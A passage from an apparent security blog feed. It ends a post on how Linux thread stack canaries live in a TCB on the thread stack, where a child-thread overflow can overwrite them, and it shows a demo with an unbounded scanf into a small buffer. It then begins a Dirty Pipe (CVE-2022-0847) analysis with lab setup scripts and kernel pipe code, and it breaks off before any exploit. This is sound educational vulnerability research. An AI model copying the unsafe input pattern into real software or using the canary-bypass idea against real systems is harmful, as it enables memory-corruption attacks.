[...]</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Initialize the TCB.  All initializations with zero should be</span></span><br><span class="line"><span class="comment">   performed in &#x27;get_cached_stack&#x27;.  This way we avoid doing this if</span></span><br><span class="line"><span class="comment">   the stack freshly allocated with &#x27;mmap&#x27;.  
*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> TLS_TCB_AT_TP</span></span><br><span class="line">  <span class="comment">/* Reference to the TCB itself.  */</span></span><br><span class="line">  pd-&gt;header.self = pd;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Self-reference for TLS.  */</span></span><br><span class="line">  pd-&gt;header.tcb = pd;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  [...]</span><br><span class="line">      </span><br><span class="line">  <span class="comment">/* Copy the stack guard canary.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> THREAD_COPY_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_COPY_STACK_GUARD</span> (pd);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>First, <code>pthread_create</code> sets up the thread stack (every thread has its own). The stack may come from a cache (for example, reusing the stack of a terminated thread) or be freshly allocated with mmap. Interestingly, <strong>the new thread's TCB is created on this thread stack</strong>, so from the user's point of view the child thread's TCB is <strong>no longer at a random location</strong>: it sits at a predictable offset from the thread's stack frames. As a result, <strong>a stack overflow in the child thread can overwrite the canary in that thread's TCB</strong>.</p><p>Note that in <code>allocate_stack</code>, the function that allocates the child thread's stack, the TCB (the <code>pthread</code> struct) is placed at the <strong>bottom of the stack</strong>: the very bottom of the thread stack (that is, its highest addresses) holds the TCB.</p><p>This is easy to verify. I copied a pthread example from the web, tweaked it slightly, then compiled and debugged it:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="comment">// a simple pthread example </span></span><br><span class="line"><span class="comment">// compile with -lpthread</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// create the function to be executed as a thread</span></span><br><span class="line"><span class="function"><span class="type">void</span> *<span class="title">thread</span><span class="params">(<span class="type">void</span> *ptr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// local buffer so that the compiler emits a stack canary check.</span></span><br><span class="line">    <span class="type">char</span> ch[<span class="number">0x20</span>];</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, ch);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>, ch);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span 
class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// create the thread objs</span></span><br><span class="line">    <span class="type">pthread_t</span> thread1;</span><br><span class="line">    <span class="comment">// start the threads</span></span><br><span class="line">    <span class="built_in">pthread_create</span>(&amp;thread1, <span class="literal">NULL</span>, *thread, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// wait for threads to finish</span></span><br><span class="line">    <span class="built_in">pthread_join</span>(thread1, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Set a breakpoint on the <code>thread</code> function, run the program, and switch to the child thread. The thread stack and the TCB address at that point are shown below; they sit very close to each other, inside the same memory mapping:</p><p><img src="/2022/08/thread_canary/image-20220825091309716.png" alt="image-20220825091309716"></p><p>The canary can then be found at the bottom of the thread stack, at an offset of <code>0x878</code> (which is admittedly rather far away):</p><p><img src="/2022/08/thread_canary/image-20220825091534174.png" alt="image-20220825091534174"></p><p>Besides the interesting way the thread stack is allocated, there is also a call to the <code>THREAD_COPY_STACK_GUARD</code> macro further down, which copies the current thread's canary into the new thread's TCB. Note that the basic unit of control flow is the thread: although every thread holds the same canary value, the canary check only reads the value stored in the current thread's TCB. In other words, if a child thread's canary is tampered with, the change does not affect the execution of the other threads.</p><p>That is about all there is to the user-space canary mechanism; it turned out to be a fairly interesting one.</p><h2 id="四、参考">IV. References</h2><ul><li><p><a href="https://zhuanlan.zhihu.com/p/435667117">Linux内核态是如何使用GS寄存器引用进程的stack canary的？ - 知乎</a></p></li><li><p><a href="https://my.oschina.net/macwe/blog/610357">解读 Linux 安全机制之栈溢出保护 - oschina</a></p></li></ul>]]></content>
    
    
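    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;I have long been curious about how the canary is implemented on Linux, but never got around to looking into it. That curiosity peaked when I learned that &lt;strong&gt;a canary can be tampered with by modifying a child thread's thread-local storage&lt;/strong&gt;, so I decided to study it properly.&lt;/p&gt;
&lt;p&gt;It has been a long time since my last blog post, so this is just a brief write-up.&lt;/p&gt;</summary>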
    
    
    
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>Linux Dirty Pipe CVE-2022-0847 Vulnerability Analysis</title>
    <link href="https://kiprey.github.io/2022/04/dirty-pipe/"/>
    <id>https://kiprey.github.io/2022/04/dirty-pipe/</id>
    <published>2022-04-02T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.995Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Dirty Pipe is a local privilege-escalation vulnerability in the Linux kernel. Its impact is comparable to Dirty COW, but it is considerably easier to exploit.</p><p>Affected range: <a href="https://github.com/torvalds/linux/commit/f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit</a> (v5.8-rc1) ~ <a href="https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903">lib/iov_iter: initialize “flags” in new pipe_buffer</a> (v5.17-rc6)</p><p>In terms of dates, that is roughly 2020/5/21 - 2022/2/21.</p><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><p>Follow the earlier <a href="https://kiprey.github.io/2021/10/kernel_pwn_introduction/">Linux pwn environment setup notes</a> to build a vulnerable Linux environment. The commit id used here is f6dd975583bd8ce088400648fd9819e4691c8958.</p><p>A few scripts, for reference:</p><blockquote><p>How the key folders are laid out:</p><ul><li><code>linux/busybox-1.34.1/_install</code>: location of the busybox file system</li><li><code>linux/myfolder</code>: holds the exp and other files that need to be copied into the VM</li></ul></blockquote><p>Script that boots Linux:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="meta prompt_">#</span><span class="language-bash">! /bin/bash</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Check that we are root; elevated privileges are needed to run gef-remote --qemu-mode</span></span><br><span class="line">user=$(env | grep &quot;^USER&quot; | cut -d &quot;=&quot; -f 2)</span><br><span class="line">if [ &quot;$user&quot; != &quot;root&quot;  ]</span><br><span class="line">  then</span><br><span class="line">    echo &quot;Please run this script as root&quot;</span><br><span class="line">    exit 1</span><br><span class="line">fi</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Build the POC</span></span><br><span class="line">g++ ./myfolder/poc.c -o ./myfolder/poc -static</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Copy the files into the rootfs</span></span><br><span class="line">cp ./myfolder/* busybox-1.34.1/_install</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Build the rootfs image</span></span><br><span class="line">pushd busybox-1.34.1/_install</span><br><span class="line">find . 
| cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line">popd</span><br><span class="line"></span><br><span class="line">gnome-terminal -e &#x27;gdb -x mygdbinit&#x27;</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">Start qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd ./rootfs.img \</span><br><span class="line">    -append &quot;nokaslr console=ttyS0&quot; \</span><br><span class="line">    -m 2G \</span><br><span class="line">    -s  \</span><br><span class="line">    -S \</span><br><span class="line">    -nographic</span><br></pre></td></tr></table></figure><p>gdbinit:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">set architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">b start_kernel</span></span><br><span class="line">c</span><br></pre></td></tr></table></figure><p>Starting qemu reported an error:</p><p><img src="/2022/04/dirty-pipe/image-20220401145316024.png" alt="image-20220401145316024"></p><p>This happened because I had forgotten to specify the memory size with <code>-m</code> when launching qemu; adding <code>-m 2G</code> to give qemu 2G of memory fixes it.</p><h2 id="三、代码浅析">III. A Brief Look at the Code</h2><p>Before analyzing the vulnerability, we need to get familiar with the code it involves, which is also a good opportunity to learn how the pipe mechanism is implemented.</p><p>The following files from commit f6dd97 are involved:</p>
<ul><li><code>include/linux/pipe_fs_i.h</code></li><li><code>fs/pipe.c</code></li><li><code>fs/splice.c</code></li><li><code>lib/iov_iter.c</code></li><li>…</li></ul><h3 id="1-pipe-相关结构体">1. pipe-related structures</h3><h4 id="a-pipe-inode-info">a. pipe_inode_info</h4><p>The <code>pipe_inode_info</code> structure holds the fields that the pipe mechanism needs:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  struct pipe_inode_info - a linux kernel pipe</span></span><br><span class="line"><span class="comment"> *  @mutex: mutex protecting the whole thing</span></span><br><span class="line"><span class="comment"> *  @rd_wait: reader wait point in case of empty 
pipe</span></span><br><span class="line"><span class="comment"> *  @wr_wait: writer wait point in case of full pipe</span></span><br><span class="line"><span class="comment"> *  @head: The point of buffer production</span></span><br><span class="line"><span class="comment"> *  @tail: The point of buffer consumption</span></span><br><span class="line"><span class="comment"> *  @max_usage: The maximum number of slots that may be used in the ring</span></span><br><span class="line"><span class="comment"> *  @ring_size: total number of buffers (should be a power of 2)</span></span><br><span class="line"><span class="comment"> *  @tmp_page: cached released page</span></span><br><span class="line"><span class="comment"> *  @readers: number of current readers of this pipe</span></span><br><span class="line"><span class="comment"> *  @writers: number of current writers of this pipe</span></span><br><span class="line"><span class="comment"> *  @files: number of struct file referring this pipe (protected by -&gt;i_lock)</span></span><br><span class="line"><span class="comment"> *  @r_counter: reader counter</span></span><br><span class="line"><span class="comment"> *  @w_counter: writer counter</span></span><br><span class="line"><span class="comment"> *  @fasync_readers: reader side fasync</span></span><br><span class="line"><span class="comment"> *  @fasync_writers: writer side fasync</span></span><br><span class="line"><span class="comment"> *  @bufs: the circular array of pipe buffers</span></span><br><span class="line"><span class="comment"> *  @user: the user who created this pipe</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mutex</span> mutex;</span><br><span class="line">    <span class="type">wait_queue_head_t</span> rd_wait, 
wr_wait;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> head;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tail;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> max_usage;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> ring_size;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> readers;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> writers;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> files;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> r_counter;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> w_counter;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *tmp_page;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync_readers;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync_writers;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *bufs;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">user_struct</span> *user;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Small as it is, this structure has everything it needs, including the wait queues for readers and writers of the pipe, the size of the pipe, the pointer to the array of buffers that hold the actual data, and so on.</p><p>A pipe stores its data in a <strong>ring queue</strong>, that is, it stores as much data as it can on a fixed-size ring (the pipe buf ring). The purpose of a few fields is therefore worth spelling out:</p><ul><li><p><code>head</code>: the index of the head of the queue; note that the unit of the index is one <code>pipe_buffer</code>. <strong>head is the position that will be written next</strong>.</p></li>
<li><p><code>tail</code>: the index of the tail of the queue. <strong>tail is the position that will be read next</strong>.</p><p>The relationship between the two fields looks roughly like this:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">low addr                                 high addr</span><br><span class="line">+--------------------------------------------+</span><br><span class="line">|  |  |  |  |  |  |  | &gt;|//|//|//|&gt; |  |  |  |</span><br><span class="line">+--------------------------------------------+</span><br><span class="line">                       A   ----&gt;   A</span><br><span class="line">                       |           |</span><br><span class="line">                     tail         head</span><br></pre></td></tr></table></figure><p>Both head and tail <strong>point at a <code>pipe_buffer</code> that is not yet full</strong> (somewhat like the end method in the STL).</p></li><li><p><code>max_usage</code>: the maximum number of pipe_buffer slots that may be used; this field bounds how much data the whole pipe can hold.</p></li><li><p><code>ring_size</code>: the number of pipe_buffer slots currently allocated; <strong>note that this value must be a power of 2.</strong></p></li><li><p><code>files</code>: the number of struct file objects referring to this pipe. For example, the read end and the write end returned by pipe() are two such objects that refer to the same pipe.</p></li><li><p><code>tmp_page</code>: caches a previously released page, which can be reused to reduce reallocation overhead.</p></li><li><p><code>bufs</code>: the array that actually holds the pipe_buffer entries; by design this one-dimensional array should be viewed as a ring.</p></li></ul><h4 id="b-pipe-buffer">b. 
pipe_buffer</h4><p>Next, let us take a brief look at the <code>pipe_buffer</code> structure, which describes the data actually stored in the pipe:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  struct pipe_buffer - a linux kernel pipe buffer</span></span><br><span class="line"><span class="comment"> *  @page: the page containing the data for the pipe buffer</span></span><br><span class="line"><span class="comment"> *  @offset: offset of data inside the @page</span></span><br><span class="line"><span class="comment"> *  @len: length of data inside the @page</span></span><br><span class="line"><span class="comment"> *  @ops: operations associated with this buffer. See @pipe_buf_operations.</span></span><br><span class="line"><span class="comment"> *  @flags: pipe buffer flags. 
See above.</span></span><br><span class="line"><span class="comment"> *  @private: private data owned by the ops.</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *page;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> offset, len;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> *ops;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> flags;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> <span class="keyword">private</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>This structure holds key information such as the page reference, the offset within the page and the data length. The available flags are:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/pipe_fs_i.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_LRU       0x01    <span class="comment">/* page is on the LRU */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_ATOMIC    0x02    <span class="comment">/* was atomically mapped */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_GIFT      0x04    <span class="comment">/* page is a gift */</span></span></span><br><span class="line"><span 
class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_PACKET    0x08    <span class="comment">/* read() as a packet */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_CAN_MERGE 0x10    <span class="comment">/* can merge buffers */</span></span></span><br></pre></td></tr></table></figure><p>We can ignore what exactly these flags mean for now.</p><h4 id="c-iov-iter">c. iov_iter</h4><p>The iov_iter structure is used to <strong>iterate</strong> over <strong>data that is split across multiple pages</strong>; in other words, it walks through the pages one by one. It is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> <span class="title class_">iter_type</span> &#123;</span><br><span class="line">    <span class="comment">/* iter types */</span></span><br><span class="line">    ITER_IOVEC = <span class="number">4</span>,</span><br><span class="line">    ITER_KVEC = <span class="number">8</span>,</span><br><span 
class="line">    ITER_BVEC = <span class="number">16</span>,</span><br><span class="line">    ITER_PIPE = <span class="number">32</span>,    <span class="comment">// the data being iterated lives in a pipe</span></span><br><span class="line">    ITER_DISCARD = <span class="number">64</span>,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">iov_iter</span> &#123;</span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Bit 0 is the read/write bit, set if we&#x27;re writing.</span></span><br><span class="line"><span class="comment">     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and</span></span><br><span class="line"><span class="comment">     * the caller isn&#x27;t expecting to drop a page reference when done.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> type;</span><br><span class="line">    <span class="type">size_t</span> iov_offset;</span><br><span class="line">    <span class="type">size_t</span> count;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">iovec</span> *iov;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">kvec</span> *kvec;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">bio_vec</span> *bvec;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">union</span> 
&#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">long</span> nr_segs;</span><br><span class="line">        <span class="keyword">struct</span> &#123;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> head;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> start_head;</span><br><span class="line">        &#125;;</span><br><span class="line">    &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Some of the fields mean the following:</p><ul><li><p><code>type</code>: indicates what kind of structure the iterated data comes from, for example:</p><ul><li>ITER_PIPE means the iterated data is page data inside a pipe.</li><li>ITER_DISCARD means that everything written to this iov_iter is discarded.</li></ul><p>When memory is later read or written through an iov_iter, this type decides which kind of read/write operation is performed.</p></li><li><p><code>iov_offset</code>: the offset within the page currently being iterated; reads and writes start from this offset in that page.</p></li><li><p><code>count</code>: the number of bytes that can still be read or written.</p></li></ul><h3 id="2-pipe-read-函数">2. The pipe_read function</h3><p>The pipe_read function lives in <code>fs/pipe.c</code>; the kernel calls it whenever it needs to <strong>read data from a pipe</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> pipefifo_fops = &#123;</span><br><span class="line">    .open             = fifo_open,</span><br><span class="line">    .llseek           = no_llseek,</span><br><span class="line">    .read_iter        = pipe_read,     <span class="comment">// read</span></span><br><span class="line">    .write_iter       = pipe_write,    <span class="comment">// 
write</span></span><br><span class="line">    .poll             = pipe_poll,</span><br><span class="line">    .unlocked_ioctl   = pipe_ioctl,</span><br><span class="line">    .release          = pipe_release,</span><br><span class="line">    .fasync           = pipe_fasync,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>First, the function is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span></span></span><br><span class="line"><span class="function"><span class="title">pipe_read</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *to)</span></span></span><br></pre></td></tr></table></figure><p>There is no need to memorize these structures; it is enough to know that:</p><ul><li><code>iocb</code>: gives access to the pointer to the current pipe structure.</li><li><code>to</code>: the destination that the data read from the pipe is written to; its type is the iov_iter iterator.</li></ul><p>Next, the kernel obtains the number of bytes to read from <code>to</code> and the <code>pipe_inode_info</code> structure from <code>iocb</code>; if the number of bytes to read is 0, it returns immediately:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">size_t</span> total_len = <span class="built_in">iov_iter_count</span>(to);</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> *filp = iocb-&gt;ki_filp;</span><br><span class="line"><span class="keyword">struct</span> <span class="title 
class_">pipe_inode_info</span> *pipe = filp-&gt;private_data;</span><br><span class="line"><span class="type">bool</span> was_full, wake_next_reader = <span class="literal">false</span>;</span><br><span class="line"><span class="type">ssize_t</span> ret;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Null read succeeds. */</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">unlikely</span>(total_len == <span class="number">0</span>))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">ret = <span class="number">0</span>;</span><br><span class="line">__pipe_lock(pipe);</span><br></pre></td></tr></table></figure><p>Next, the kernel checks whether the pipe is full and records the result in the <code>was_full</code> flag:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">was_full = pipe_full(pipe-&gt;head, pipe-&gt;tail, pipe-&gt;max_usage);</span><br></pre></td></tr></table></figure><p>This flag matters little for understanding the main logic; it is mentioned here so that we can see how a pipe decides whether it is full:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_occupancy - Return number of slots used in the pipe</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">unsigned</span> <span class="type">int</span> <span class="title">pipe_occupancy</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> head - tail;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_full - Return true if the pipe is full</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> * @limit: The maximum amount of slots available.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">pipe_full</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail,</span></span></span><br><span class="line"><span class="params"><span class="function">                 
